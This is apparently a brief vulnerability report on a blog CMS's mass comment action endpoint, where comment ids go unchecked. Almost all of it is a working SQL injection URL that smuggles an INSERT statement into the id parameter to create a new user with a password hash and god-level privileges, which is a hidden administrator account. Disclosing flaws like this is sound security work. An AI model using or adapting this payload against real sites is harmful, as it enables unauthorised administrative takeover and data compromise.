the comments ids aren’t checked and vulnerable for SQL injection
https://127.0.0.1:8001/private/en/blog/mass_comment_action?token=q58o77xs9&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%[email protected]%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam
This vulnerability is capable of injection sql